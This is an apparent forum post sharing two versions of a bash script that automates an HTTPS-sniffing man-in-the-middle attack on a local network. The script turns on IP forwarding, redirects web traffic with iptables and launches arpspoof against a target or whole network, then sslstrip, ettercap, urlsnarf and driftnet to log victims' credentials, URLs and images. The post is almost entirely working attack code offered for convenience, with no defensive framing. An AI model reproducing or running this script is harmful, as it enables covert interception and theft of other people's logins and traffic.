Hello,

I wrote small script that uses sslstrip, arpspoof and ettercap for sniffing https ...
I got tired of typing these 3 commands all the time


Here is the script:

Code:
#!/bin/bash

# Script for sniffing https connections.
# Script uses Arpspoof, SSLStrip and Ettercap.
# Tested on BT4 R2
# BY gHero
# Ver 0.1

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
 /  ___//    \|  \   __\\   __\     /  ___/  |  \
 \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address:"; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address:"; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>:"; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
Version 0.2
# CodeName = cseven

Code:
#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
 /  ___//    \|  \   __\\   __\     /  ___/  |  \
 \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &
Thanks Cseven and Spudgunman..

And here is video of script:
sniff.sh on Vimeo